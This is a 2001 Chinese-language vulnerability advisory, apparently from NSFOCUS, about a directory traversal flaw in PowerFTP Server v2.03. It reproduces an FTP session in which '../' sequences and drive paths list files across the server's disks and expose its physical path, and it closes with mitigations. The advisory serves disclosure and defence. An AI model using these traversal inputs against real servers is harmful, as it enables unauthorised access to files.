PowerFTP Server 目录遍历漏洞
发布日期:2001-11-28
更新日期:2001-11-29
受影响系统:
PowerFTPServer v2.03
描述:
PowerFTP Server是Windows平台下的FTP服务器。
该FTP服务器存在一个安全问题,通过在命令参数中增加“../”等字符串,可能允许远程攻击者遍历整个文件系统。
<*来源:al3x hernandez (
al3xhernandez@ureach.com)
链接:
http://archives.neohapsis.com/archives/bugtraq/2001-11/0243.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
al3x hernandez (
al3xhernandez@ureach.com)提供了如下测试代码:
泄露FTP物理路径:
# uname -a
SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
#
# ftp 10.0.0.1
Connected to 10.0.0.1.
220 Personal FTP Server ready
Name (10.0.0.1:root): temp
331 Password required for temp.
Password:
230 User temp logged in.
ftp>
ftp> pwd
257 "C:/WINDOWS/Application Data/Microsoft/Internet Explorer/Quick
Launch/Mis documentos/tools/" is current directory.
ftp> cd .../.../
501 CWD failed. Cannot accept relative path using dot notation
ftp>
返回上层目录:
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
AUTOEXEC.DOS
CONFIG.DOS
VIDEOROM.BIN
CONFIG.SYS
DBLSPACE.BIN
MSDOS.SYS
MSDOS.---
SETUPLOG.TXT
WINDOWS
test.txt.txt
#
226 File sent ok
remote: ../../../../../../../
561 bytes received in 0.12 seconds (4.61 Kbytes/s)
ftp>
遍历C盘:
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
[...]
遍历D盘:
ftp> ls d:/
200 Port command successful.
150 Opening data connection for directory list.
00000001.LT1
AREF
AUTORUN.EXE
AUTORUN.INF
AUTORUN.INI
CLCD16.DLL
CLCD32.DLL
CLUF.TXT
D6F04BA8.BIN
DPLAYERX.DLL
DRVMGT.DLL
EE
EEAUTO.ICO
[...]
遍历A盘:
ftp> ls a:/
200 Port command successful.
150 Opening data connection for directory list.
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 换用其它安全的FTP服务器
* 禁止不可信用户访问该FTP服务器
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.cooolsoft.com
浏览次数:4602
严重程度:0(网友投票)